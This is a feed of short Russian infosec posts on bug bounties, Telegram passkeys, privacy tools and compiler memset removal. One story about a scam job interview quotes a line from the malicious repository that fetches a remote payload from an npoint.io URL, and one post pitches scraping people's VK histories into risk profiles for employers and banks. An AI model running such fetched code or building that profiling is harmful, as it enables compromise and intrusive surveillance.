Информационная безопасность

Альфа-Банк расширяет Bug Bounty-программу по поиску уязвимостей

Альфа-Банк расширяет публичную Bug Bounty-программу на платформе BI.ZONE Bug Bounty и добавляет новые цифровые сервисы в область тестирования. К проверке в рамках программы становятся доступны следующие цифровые сервисы:

• Альфа-Офис — онлайн-анкета и электронный документооборот для подключения и обслуживания юридических лиц: подача заявок, заполнение анкет и подписание договоров с банком без визита в отделение.

• Альфа-Финанс — веб-система факторинга и финансирования поставок.

• Карьерный сайт — карьерный портал Альфа-Банка и витрина для Digital/IT-команд с вакансиями, описаниями команд, форматов работы и полным путём кандидата от отклика до оффера.

• Alfa People — корпоративный HR-сервис и мобильное/веб-приложение для сотрудников и кандидатов: новости, внутренние сервисы, работа с оффером, ввод персональных данных и загрузка документов при трудоустройстве.

• BaaS (Banking-as-a-Service) и Alfa API — платформа открытых API Альфа-Банка, которая помогает бизнесу и партнёрам встраивать банковские возможности в свои продукты: от платежей и счетов до кредитных сценариев и других финансовых функций.

Подробный список целей, технические детали по каждому сервису, а также актуальные правила и размеры вознаграждений доступны в описании публичной баг баунти программы Альфа-Банка на платформе BI.ZONE Bug Bounty. 

Размер выплат зависит от критичности обнаруженной уязвимости и может достигать 1 000 000 рублей.

Bug Bounty – это публичная программа поиска уязвимостей, запущенная для того, чтобы сделать процесс тестирования безопасности максимально прозрачным и эффективным, что делает продукты Альфы надёжнее и защищеннее. Команда по кибербезопасности совместно с сообществом исследователей выявляет и устраняет потенциальные уязвимости до того, как ими смогут воспользоваться злоумышленники.

Чтобы присоединиться к программе, достаточно зарегистрироваться или авторизоваться на платформе, выбрать программу Альфа-Банка, ознакомиться с правилами и областью тестирования и направить отчёт через платформу.

Разработчики из РФ замучили мошенника, заставив его проходить бесконечную капчу. Скамер притворился главой одной российской компании и писал на английском. Сотрудники компании должны были отсканировать подарочные сертификаты на его сайте на 1500 евро. Оказалось, в эту игру можно играть вдвоём. Разрабочтики сделали вид, что поверили обманщику и скинули ему ссылку на файлообменник, состряпанный на скорую руку. Идея которого заключалась в бесконечной капче. Бедолага пытался пройти её 1,5 часа, но ничего не выходило. А разработчики добавили ещё и верификацию по видел, которую скамер тоже начал проходить.

Представлен открытый защищённый менеджер паролей PearPass, который хранит ключи на локально и не передаёт их в облако. Синхронизация между устройствами пользователя происходит через зашифрованное соединение. Есть встроенный генератор надёжных паролей. Приложение также проверяет слабые пароли.

Юрист по ИБ ГК InfoWatch Илья Башкиров выступил на юридической конференции Ассоциации банков России. Тема — «Тренды развития отечественного банковского права».

Наш эксперт выступил на круглом столе «Цифровой щит банковского права: антифрод и персональные данные», где обсуждали вопрос уголовной ответственности за неправомерное обращение с персональными данными и влияние законодательства о противодействии мошенничеству на обработку ПДн.

Илья Башкиров отметил, что новый состав преступления не меняет общих принципов российского права ­— преступление требует вины и умысла, а он отсутствует у ИБ‑сотрудников.

«Безопасность нередко служит безграничным оправданием для агрессивного сбора данных — в том числе «про запас». Обеспечение безопасности действительно требует сбора данных для статистики, прогнозирования и моделирования — в том числе от легитимных пользователей. Здесь важно, чтобы собранные данные использовались строго по назначению, а не для маркетинга или иного профилирования. Необходимо также устанавливать разумные пределы по типам и объемам собираемых данных».

Находим зловреды в любых файлах. Представлен открытый проект для анализа статического вредоносного ПО Qu1cksc0pe. Решение умеет анализировать исполняемые файлы, показывать, какие DLL файлы используются, видит все функции и API, разделы и сегменты, URL-адреса, IP-адреса, электронные письма, считает разрешения на Android, расширения и имена файлов. Проект сканирует документы: Word, Excel, HTML, Portable, OneNote, а также находит вирусы в файлах архивов ZIP, RAR и ACE.

В обновлении Telegram появилась возможность создать на устройстве ключ доступа (passkey), который позволит мгновенно входить в мессенджер с помощью PIN или биометрических данных, в том числе Face ID и отпечатка пальцев. Криптографические ключи для входа будут храниться на устройстве и могут синхронизироваться с приложениями для управления паролями от iCloud, Google и других сервисов.

«Ключи доступа работают всегда и везде — и при перебоях с СМС, и в заграничных поездках, и даже в лифтах на парковках», — пояснили в Telegram, используя мем про другой мессенджер.

Прошли аттестацию высшего уровня защиты данных УЗ-1 🛡

Официально подтвердили максимальный уровень защищенности нашей инфраструктуры.

Теперь вы можете размещать медицинские системы и работать с любыми специальными категориями данных (здоровье, биометрия).

➖ Локации: Москва, Санкт-Петербург, Новосибирск
➖ Защита: аппаратные межсетевые экраны, IDS/IPS, сканирование уязвимостей, контроль целостности среды виртуализации

Ссылка на документы →

Сервисы, которые позволяют проверить приватность в браузере и выявить утечки личных данных:

• Browserleaks: подскажет, какие данные ваш браузер раскрывает другим сайтам;

• CreepJS: оценивает, сколько технической информации ваш девайс отдаёт в фоне;

• FingerprintJS: демонстрирует, насколько уникален ваш цифровой отпечаток;

• Cover Your Tracks: быстрый тест, который показывает, насколько легко вас идентифицировать;

• WebBrowserTools: набор простых тестов для оценки приватности и безопасности в браузере.

Зовем на огонёк!

Привет, Хабр!

18 декабря в 11:00 вместе с Алексеем Дроздом aka @labyrinth начальником отдела безопасности «СёрчИнформ», мы будем провожать 2025 год. Присоединяйтесь!

В неформальной обстановке поделимся вредными ИБ-советами, забавными случаями из практики и просто побеседуем о жизни нашей в ИБ. В программе никакого официоза, только хорошее настроение, (не)много шампанского и нешуточные истории.

Зарегистрироваться можно по ссылке, а смотреть, нарезая оливье.

Краткий курс по выявлению уязвимостей

Как выглядит веб-приложение глазами атакующего, какие дыры в безопасности встречаются чаще всего и что с этим делать на практике? В статье «Основы безопасности веб-приложений: краткий «курс» по выявлению уязвимостей» наш AppSec BP собрал небольшое обучение по основам безопасности веб-приложений — от базового понимания архитектуры до превентивного выявления уязвимостей.​

Разбираем, где именно в типичном веб-стеке возникают риски, как связаны между собой классы уязвимостей из OWASP Top 10 и что разработчикам, тестировщикам и безопасникам нужно проверять в первую очередь. Материал не ограничивается теорией: показан практический подход к поиску багов, типичные ошибки при настройке доступа, аутентификации, логирования и работы с внешними компонентами.​

Статья будет полезна backend и frontend разработчикам, тимлидам, DevOps-инженерам и начинающим AppSec-специалистам, которые хотят выстроить базовое «мышление безопасностью» и научиться видеть приложение так, как его видит злоумышленник.

Ключевые элементы киберустойчивости

Директор дирекции кибербезопасности ОТП Банка Антон Замараев выступил на сессии «Киберустойчивость как новая стратегическая метрика бизнеса» в рамках Киберсъезда 2025, прошедшего в Кибердоме в Москве. Он рассказал о состоянии киберустойчивости сегодня и поделился взглядом на будущее, в котором компании объединяют усилия, чтобы быстрее и эффективнее противостоять угрозам. Делимся основными мыслями.

1. Киберустойчивость — это не попытка избежать атак, которые все равно произойдут. Это способность максимально быстро устранить возникшую угрозу и восстановить работу сервисов. «Мы не можем полностью заблокировать работу сервисов или ограничить текущий процесс, бизнес должен работать всегда. Поэтому наша задача — встроить такие механизмы безопасности, которые позволяют обнаруживать и устранять угрозы без вреда для бизнеса», — сказал Антон.

2. В ОТП Банке процессы выстроены так, чтобы разработчики и devops-команды могли самостоятельно замечать и исправлять уязвимости. Это снижает нагрузку на профильных специалистов и ускоряет работу. При этом важной частью системы становится оперативный мониторинг: контроль нужен не только внутри инфраструктуры, но и на внешних сервисах, в том числе в клиентских зонах.

3. Сейчас ключевым элементом киберустойчивости становится регулярное тестирование негативных сценариев: «Важно понимать, из чего состоят процессы, какие системы за ними стоят и в какой последовательности нужно их восстанавливать. Это позволяет командам уверенно действовать даже в непривычных ситуациях».

4. Технологический горизонт: квантовые вычисления в ближайшие годы могут поставить под угрозу привычные методы шифрования. Подготовка к переходу на криптографию нового поколения — вызов, который весь рынок еще только начинает осознавать.

5. Завершая выступление, Антон сформулировал идею, которую назвал своей профессиональной мечтой: создание добровольной системы коллективной кибербезопасности. По его словам, компании могли бы передавать друг другу не формальные отчеты, а реальный опыт — как победили конкретную угрозу, какие методы сработали, какие нет. Такой обмен, считает он, сделал бы рынок заметно устойчивее.

«Каждая компания проходит один и тот же путь: сталкивается с похожими угрозами, решает похожие задачи. Если бы мы начали добровольно делиться экспертизой, мы бы все стали защищеннее и быстрее реагировали на новые вызовы», — отметил Антон Замараев.

В Telegram заработала система входа в аккаунт через Passkey, но только для российских номеров телефона. Ключевое преимущество Passkeys — возможность войти в аккаунт в одно касание, не вводя номер телефона и одноразовый код.

Как создать ключ:

• Убедитесь, что у вас последняя версия мессенджера (Android — 12.2.10; iOS — 12.2.3).

• Как и вход по почте, новую функцию нужно предварительно настроить. Для этого откройте Настройки › Конфиденциальность › Ключи доступа.

• Если пункт «Ключи доступа» отсутствует, то эта опция недоступна для вашего аккаунта. На текущий момент Passkeys доступны только для аккаунтов, к которым привязан российский номер.

• Нажмите «Добавить ключ доступа» и подтвердите его создание.

• Устройство может запросить код экрана блокировки или биометрию, чтобы разблокировать хранилище ключей.

• Созданный ключ появится в списке.

Как войти с помощью ключа:

• На актуальной версии Telegram для Android или iOS приложение автоматически предложит выбрать ключ доступа для входа.

• Если это не происходит, через несколько секунд под заголовком «Номер телефона» появится ссылка «используйте ключ доступа», на которую следует нажать.

• Нажатие на кнопку запустит ваш менеджер паролей, который предложит выбрать ключ, проверит вашу личность по лицу, отпечатку пальца либо PIN-коду экрана блокировки, а затем передаст выбранный ключ мессенджеру.

• Ключ доступа выполняет функции как номера телефона, так и одноразового кода подтверждения одновременно.

• Если вы включили двухфакторную авторизацию для аккаунта, вам потребуется ввести свой облачный пароль, который вы задали самостоятельно.

Как я чуть не прошёл собеседование у «миллиардера» из Alchemy

Утро начиналось, как обычно — кофе, почта, LinkedIn.
И тут сообщение в linkedin:

«Здравствуйте! Мы хотим пригласить вас на позицию менеджера высшего звена в Alchemy!»

Листаю ниже — и кто, вы думаете, будет меня собеседовать? Сам Joseph Lau, вот его профиль.
Ну думаю, шутки в сторону. Миллиардер, всё серьёзно.

Назначаем митинг. У него всего одно свободное время — 9:30 утра по Лос-Анджелесу.
У богатых свои причуды. Я киваю в монитор: ладно, сыграем по-крупному.

Включаю режим «серьёзного специалиста»:
повторяю управление проектами, техстеки, quick refresh по Kafka — вдруг неожиданно спросят.
Даже откопал старые FIX-скрипты, которыми когда-то биржи Ближнего Востока подключал.

Волнуюсь, завариваю чай, сижу жду.
9:26. Google Meet пишет: «Ваш собеседник онлайн».

Подключаюсь — и вместо ожидаемого азиатского миллиардера вижу индуса. Сидит, улыбается в камеру. Глуповато.

Ну ладно, думаю, и Сатья Наделла индус. Бывает.

Парень оживляется, начинает интервью с комплиментов:

«Вы такой редкий специалист, мы давно искали именно вас!»

Я чуть растаял. Но быстро вернул фокус, когда он спросил, сколько я хочу зарабатывать.
Называю сумму. Он — ни моргнуть глазом:
— Отлично! Проверим ваши технические навыки.

Через секунду — ссылка на репозиторий:
👉 Bitbucket: alchemy-lab/p12-alchemy-mvp

«Посмотрите проект», — говорит.

Открываю. Пять абзацев, ноль смысла.
Пишу ему, что "документация" больше похожа на шутку.
Он улыбается — и бац, камера отвалилась.

— Простите, интернет плохой. Вы тоже выключите.

Думаю: ага, плохой интернет в Америке — классика.
Даже стало гордо за моего провайдера который даст фору всей Силиконовой долине.

Ладно.
Он предлагает запустить проект «вместе». Я не против.
Не стесняясь расшаренного экрана, открываю ChatGPT и прошу сгенерировать docker-compose.yml и Dockerfile для Next.js.

Он напрягся:
— Что вы делаете?
Я ему спокойно:
— Запускаю незнакомую дрянь в изолированной песочнице. Без лишних сюрпризов.

Через минуту проект крутится. Он смотрит, кивает, говорит:

«С вами обязательно свяжутся!» — и отключается.

Сижу, смотрю на экран. Что-то не даёт покоя.
Открываю код, бегло ищу глазами — и вот он, красавец:

const response = await axios.get('https://api.npoint.io/43c98e897c8540091987')

И тут всё стало на свои места.
Мой покойный нигерийский дядя с миллионами в банке воскрес — и решил поиграть в стартапера из Alchemy.

Дальше копать неинтересно.
Скучные жулики — даже без фантазии.

💡 Вывод:
Никогда не запускайте на своём компьютере никакой код — даже если вам прислали его «от имени Microsoft», Google или Alchemy.
Пока нет подписанного контракта и корпоративного ноутбука, — никаких экспериментов.

Берегите себя.
И помните народную мудрость:

Если красавица на х:% бросается — будь осторожен, триппер возможен.

P.S.
Да, всё это реально случилось.
А история про индуса — просто напоминание, что даже айтишная ловушка может начинаться с вежливого письма и золотого LinkedIn-профиля.

Если вы держите сети и ИБ на себе — не пропустите этот дайджест

Если вы отвечаете за сети и ИБ, но разрываетесь между BGP, VXLAN, Kubernetes, DevSecOps, SOC и SIEM — мы уже собрали для вас короткую «карту местности».

В дайджесте — бесплатные открытые уроки, базовые и продвинутые курсы по сетям и безопасности, подготовительные мини-курсы за 10 ₽ и подборка лучших статей по ИБ и сетям.

Заходите в дайджест, выберите свой уровень и тему и успейте записаться на уроки и курсы из ноябрьско-декабрьских наборов.

Коллега обнаружил забавный момент, который идёт в копилку "PVS-Studio — двигатель прогресса".

Слышали ли вы про то, что злобные C и C++ компиляторы могут удалить вызов memset в конце функции во время оптимизаций? У нас даже про это есть диагностика V597.

Это давно известная, но при этом живучая потенциальная уязвимость CWE-14: Compiler Removal of Code to Clear Buffers. В следующем коде компилятор удалит заполнение памяти нулями (вызов memset), так как после этого буфер не используется. Раз не используется, то заполнение буфера с точки зрения языка C++ не имеет каких-либо наблюдаемых эффектов и, следовательно, является лишим. Т. е. его можно и нужно удалить с целью оптимизации.

void sha1_hmac( unsigned char *key, int keylen,
                unsigned char *input, int ilen,
                unsigned char output[20] )
{
  sha1_context ctx;

  sha1_hmac_starts( &ctx, key, keylen );
  sha1_hmac_update( &ctx, input, ilen );
  sha1_hmac_finish( &ctx, output );

  memset( &ctx, 0, sizeof( sha1_context ) );
}

Код позаимствован из статьи про проверку проекта PPSSPP.

Проблема насущная, и для её решения в стандарт C23 внесли новую функцию memset_explicit, которая теперь обязательна для реализации в стандартной библиотеке вместо memset_s. Так вот, автор предложения (Miguel Ojeda, P1315) в своём документе сослался на нашу диагностику (ссылка N3).

И похоже, что он давно про нас знает, т. к. умудрился вставить ссылку ещё аж на старый сайт viva64.

Не зря столько лет говорим про memset. Приятно, что нас уже в proposal-ы затаскивают :)

Я сделал штуку, которая за час-полтора, если хватит денего на серверы то = за минуты, читает ВСЁ, что человек писал во «ВКонтакте» за 12 лет, и выдаёт честное ревью: добряк-ботан, токсичный вояка или шизо-экстремал. Без суда, без сплетен — только цифры и цитаты. Или проверить себя и понять, что нужно удалить некоторые посты от греха подальше. Может у тебя было время когда тебе нравился товарищ Ленин, а сегодня его запретили.

Как работает

1. Вбиваешь ссылку на страницу (или свой ID).

2. Сервис скачивает 100 % постов и комментов (официальное VK API, никакого взлома).

3. Bert + detoxify считают токсичность, темы и сентимент.

4. Через время получаешь PDF:
   – сколько негатива/позитива;
   – топ-темы (рыбалка, политика, IT, наркота, оружие);
   – риск-флаги (экстремизм, суицид, оружие, наркота) с прямыми цитатами;
   – динамику: «в 2022 стал злее на 37 %».

Пример из жизни
Проверил себя — 8 % токсичности, 0 флагов. Проверил соседа — 38 % токсичности, 1 постов про ствол.

Законно ли?
Собираю только публичное, без переписок. Профиль закрыт — пишет - доступа нет.

Зачем это вообще

1. HR-отделы — чекнуть кандидата до интервью.

2. Самопроверка перед поступлением/наймом.

3. Родители — глянуть, чем реально живёт подросток.

4. Банки/страховщики — оценить риск-поведение (агрессия/суицид = выше вероятность ДТП).

Что дальше
Если пост наберёт ≥ 300 «вверх» и 50+ комментов «хочу» — допиливаю приложение в продакшн версию для запуска. Если больше - докручу Instagram и TikTok. Своим варианты скидывайте в комменты.

Понадобиться ли вам такой «цифровой зеркал» или это очередной «пылесос для данных»? В комментариях — пишите, кого первым проверить: своё начальство, бывшего или самого себя :)

Привет, Хабр! Сегодня отмечается Международный день защиты информации. Поздравляем всех, кто стоит на страже цифровых рубежей и помогает компаниям защищаться от хакеров, инсайдеров и ИБ-инцидентов. Желаем увеличения ИБ-бюджетов, расширения штата службы безопасности и снижения числа подтвердившихся инцидентов!

А пока – делимся полезными материалами, как обучить сотрудников правилам ИБ, чтоб облегчить ежедневную рутину отделу безопасности.

Гайды по главным угрозам в сети – чтоб сотрудники не попадались на уловки кибермошенников:

• Про опасности в соцсетях

• Про фишинговые письма

• Про мошеннические сайты

• Про дипфейки

Эффективные практики ИБ-ликбеза в коллективе:

• Как научить пользователей парольной безопасности

• Как организовать обучение ИБ, чтоб сотрудники вас не возненавидели

• Почему риторика – важный инструмент безопасника, и как ее прокачать: раз, два

С профессиональным праздником, коллеги!

Проверяем, взломали ли вас хакеры или ваш IP в списке ботнетов. Исследователи из GreyNoise выпустили сервис GreyNoise IP Check, который позволяет быстро узнать, залез ли кто-то в вашу сеть. Сканер считает ваш IP-адрес и начнет искать совпадения в известных ботнет-сетях, которые используют для DDoS-атак.

При обращении к GreyNoise IP Check пользователи получают один из трёх статусов. «Clean» означает, что подозрительной сканирующей активности с этим адресом не фиксировалось. «Malicious/Suspicious» сигнализирует о том, что IP замечен в сканировании и имеет смысл проверить устройства в локальной сети. «Common Business Service» указывает на принадлежность адреса сетевым защитным сервисам, корпоративной инфраструктуре или облачному провайдеру — в таких условиях активное сетевое сканирование внешних адресов и портов часто выполняется легитимными средствами мониторинга и тестирования безопасности. То есть не свидетельствует о заражении.

Если по IP‑адресу обнаружена какая‑либо активность, сервис показывает хронологию за 90 дней. Такая история помогает связать начало подозрительных сканов с установкой конкретного приложения, в том числе клиента для распределения трафика или сомнительной программы, и затем устранить источник проблемы.

4 раунда за 2 недели собеседований → оффер в пятницу → отказ в понедельник.
Причина?
Мой чертов LinkedIn, который я не обновлял пару лет.

Все любят истории успеха 🙃
Но вот вам история НЕ-успеха - и при этом моя собственная.

За последние 2 недели прошёл:
🟢 HR-интервью
🟢 Техническое интервью (жёсткое, но честное)
🟢 Интервью с командой
🟢 Интервью с CPO
🟢 Получил оффер. Подтвердили, что всё ок.

В пятницу вечером в почте лежал «Welcome aboard».
Я, честно - обрадовался. Уже mentally onboarded. И самое !главное! крутая команда, крутые задачи впереди, возможность строить инфраструктуру с нуля и возможность топить в ИБ (реальную а не бумажную) - ну восторг жеж. Да я уже запланировал фаст-вины на первые 30 дней!

А в понедельник приходит письмо:
«СТО принял решение не двигаться дальше. Ваш опыт в резюме не соответствует тому, что в LinkedIn».

Что?! Какого?!
LinkedIn, который я не вёл несколько лет?
Площадка, которую большинство инженеров обновляет раз в эпоху?

Я объяснил, что могу подтвердить опыт трудовой, рекомендациями, стеками проектов, GitLab’ами, CI/CD пайплайнами - чем угодно.
Ответ:
«Решение финальное».

И вот честно - я не злюсь. (да что уж там, бесился первые пол часа)
Но вся эта ситуация подсветила кое-что важное:
Нужно делать то, что приведет напрямую к приему на работу, я повторил всю теорию, прошелся по практике - а надо было резюме пилить.

*Мой личный инсайт* В эпоху, когда DevOps пишет IAC, придумал собственный термин, что карьера тоже - Career As a Code, и её надо поддерживать.

Так что да: обновляю LinkedIn.
Да: выкладываю эту историю.
Да: остаюсь мотивирован строить системы, усиливать DevOps и DevSecOps, выстраивать безопасность, SRE, процессы, документирование, хаос-устойчивость - всё то, в чём я реально силён.

Может я единственный, кто еще живет по старому, а все остальные давно проснулись в матрице?

Как часто вы обновляете ЛН?

Отзыв на книгу "Кибербезопасность: правила игры. Как руководители и сотрудники влияют на культуру безопасности в компании" Эллисон Сэрра.

Уже который раз беру книгу по теме своей профессиональной деятельности. Вроде как это полезно для развития. И уже который раз разочаровываюсь, потому что не могу почерпнуть полезных материалов. Даже, например, громкие интересные кейсы кибератак. И этого не встречаю.

Книга бесполезна для профессионалов в области информационной безопасности. Для всех остальных несёт тоже не очень много пользы. Разве что для тех, кто живёт «в вакууме» без соцсетей, новостей и технологий. Несколько интересных фактов из сферы кибербезопасности. И дальше — наши любимые маркетинговые штучки бизнес-литературы: интересные факты из истории, бизнеса, которые по смыслу очень издалека прикручивают к теме кибербеза, просто по аналогии. Но повествование, поверхностно касающееся названия самой книги, несёт за собой потраченное время читателя. Я бы назвала это эссе-рассуждением на тему "хайпового" кибербеза. Но автор написала и продала нам это как книгу. И тут уже напрашивается придирка к тому, что пишет это не профессионал в ИБ, а именно маркетолог в мире ИБ.

Говорят, это распространённая проблема бизнес-литературы: вместо глубины — «водянистые» рассуждения и пересказ очевидных вещей.

Хочется уточнить, почему мне не понравилась книга. Потому что я часто хожу на отраслевые конференции по информационной безопасности. И видела там много. Чаще всего там или обозревают изменения в законодательстве, говорят о важности защиты, о хакерских атаках, ну и параллельно продают нам услуги или средства по защите информации. Многие ходят больше себя показать. Буквально. Или удовлетворить потребность в общении, которая переходит границы разумного. Но сейчас не об этом. А о том, что многие сейчас занимаются маркетингом, прикрывая это конкретной сферой деятельности. И в данном случае — это сфера кибербеза. И в этом не было бы ничего плохого, если бы это всё тоже не переходило границы разумного. Экспертиза подменяется долгими историями без реальной ценности. А болтуны тратят наше время. Да, маркетологи поднимают важные вопросы о защите. Но сколько можно поднимать, а не предпринимать или давать конкретные пути решения.

Мне тоже прилетало за некомпетентность здесь в блоге. Однажды была свидетелем, как на конференции чуть не случилась драка, когда спикер рассказывал про полезные бесплатные инструменты по ИБ, а один из слушателей не мог сдержаться от критики и буквально с места кричал: "туфта". Но... всё же, часто авторы, не обладающие глубокими познаниями в предметной области, пытаются продать свои продукты, маскируя их под экспертные издания. Это и приводит к размыванию границ профессионализма и уменьшению доверия. Причем не только к подобным материалам, но в целом к сфере.

Но возможно, проблема, описанная мной, немного преувеличена, и во мне просто протестует, что мои ожидания не совпали с реальностью.